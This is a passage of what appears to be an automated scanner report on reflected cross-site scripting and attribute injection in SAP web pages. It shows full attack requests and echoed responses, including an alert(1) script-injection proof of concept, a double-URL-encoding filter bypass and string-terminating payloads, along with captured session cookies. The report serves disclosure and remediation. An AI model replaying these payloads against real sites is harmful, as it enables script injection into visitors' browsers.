Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; UsersDefaultCountry=US; UsersDefaultLanguage=EN

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:02 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:02 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 14011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="content-t
...[SNIP]...
<a href="/us/en/training-locations/us623de%22%3e%3ca%3eae98752707030461"><a>e5b6240e46c">
...[SNIP]...

1.60. http://weblogs.sdn.sap.com/pub/wlg/27079 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/wlg/27079

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93679"><script>alert(1)</script>7a7c3cccb42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pub/wlg/27079?93679"><script>alert(1)</script>7a7c3cccb42=1 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/27079
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); shpuvid=172.16.92.241.1321213592635805; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f27079; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=session#1321213478215-608827#1321215590|check#true#1321213790; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1321215529275%3B%20pe%3Dno%2520value%7C1321215529283%3B%20c3%3Dscn%253Ablog%253Amanuel%2520bellet%253Adynamically%2520handling%2520structure%2520data%2520types%2520defined%2520on%2520a%2520remote%2520dictionary%7C1321215529289%3B%20s_nr%3D1321213729321-Returning%7C1323805729321%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813729328%3B%20s_visit%3D1%7C1321215529331%3B%20gpv_p47%3Dno%2520value%7C1321215529336%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D10%3B%20s_sq%3Dsapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:51:32 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17395


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

   <title>SAP Network Blog: Dynamically Handling Structure Data Types Defined on a Remote Dictionary</title>
   <link href=
...[SNIP]...
<a class="sapTxtSml" href="/pub/wlg/27079?page=last&93679"><script>alert(1)</script>7a7c3cccb42=1&x-showcontent=off#thread">
...[SNIP]...

1.61. http://www.sap.com/about/company/legal/copyright/index.epx [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /about/company/legal/copyright/index.epx

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddb5%2522a%253d%2522b%2522cd1ccbe2671 was submitted in the REST URL parameter 5. This input was echoed as 5ddb5"a="b"cd1ccbe2671 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about/company/legal/copyright/index.epx5ddb5%2522a%253d%2522b%2522cd1ccbe2671 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39403
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:45 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:45 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx5ddb5"a="b"cd1ccbe2671" />
...[SNIP]...

1.62. http://www.sap.com/about/company/legal/impressum.epx [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /about/company/legal/impressum.epx

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffeb4%2522a%253d%2522b%2522600f8c1162f was submitted in the REST URL parameter 4. This input was echoed as ffeb4"a="b"600f8c1162f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about/company/legal/impressum.epxffeb4%2522a%253d%2522b%2522600f8c1162f HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39393
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:39 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:39 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/corporate-en/our-company/legal/impressum.epxffeb4"a="b"600f8c1162f" />
...[SNIP]...

1.63. http://www.sap.com/about/company/legal/privacy.epx [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /about/company/legal/privacy.epx

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0dd%2522a%253d%2522b%25229f3cec84851 was submitted in the REST URL parameter 4. This input was echoed as 1f0dd"a="b"9f3cec84851 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about/company/legal/privacy.epx1f0dd%2522a%253d%2522b%25229f3cec84851 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39387
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:38 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx1f0dd"a="b"9f3cec84851" />
...[SNIP]...

1.64. http://www.sap.com/about/company/legal/terms_of_use.epx [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /about/company/legal/terms_of_use.epx

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e515a%2522a%253d%2522b%2522596a31fd57e was submitted in the REST URL parameter 4. This input was echoed as e515a"a="b"596a31fd57e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about/company/legal/terms_of_use.epxe515a%2522a%253d%2522b%2522596a31fd57e HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 39402
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:05:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:05:40 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:05:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epxe515a"a="b"596a31fd57e" />
...[SNIP]...

1.65. http://www.sap.com/business_management_software/inventory_management.epx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /business_management_software/inventory_management.epx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a950b%2522a%253d%2522b%252216285773807 was submitted in the REST URL parameter 2. This input was echoed as a950b"a="b"16285773807 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /business_management_software/inventory_management.epxa950b%2522a%253d%2522b%252216285773807 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34684
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:59 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:59 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/software/inventory_management.epxa950b"a="b"16285773807" />
...[SNIP]...

1.66. http://www.sap.com/communities/index.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /communities/index.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload befcd%2522a%253d%2522b%2522a7ad0d78ceb was submitted in the REST URL parameter 2. This input was echoed as befcd"a="b"a7ad0d78ceb in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /communities/index.aspxbefcd%2522a%253d%2522b%2522a7ad0d78ceb HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 36090
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/communities/index.epxbefcd"a="b"a7ad0d78ceb" />
...[SNIP]...

1.67. http://www.sap.com/contactsap/directory/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /contactsap/directory/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11235'%3bb3a98b94547 was submitted in the REST URL parameter 1. This input was echoed as 11235';b3a98b94547 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactsap11235'%3bb3a98b94547/directory/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34137
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:06 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:06 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='contactsap11235';b3a98b94547';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.68. http://www.sap.com/corporate-en/our-company/legal/copyright/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /corporate-en/our-company/legal/copyright/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1715c'%3b2afb3a939ff was submitted in the REST URL parameter 1. This input was echoed as 1715c';2afb3a939ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /corporate-en1715c'%3b2afb3a939ff/our-company/legal/copyright/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34311
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='corporate-en1715c';2afb3a939ff';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.69. http://www.sap.com/corporate-en/our-company/legal/copyright/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /corporate-en/our-company/legal/copyright/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c7db'%3b1b431263886 was submitted in the REST URL parameter 2. This input was echoed as 4c7db';1b431263886 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /corporate-en/our-company4c7db'%3b1b431263886/legal/copyright/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 26485
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:14 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='our-company4c7db';1b431263886';
var DOCUMENTNAME='Error';


var _s_cf17='corporate-en';


</script>
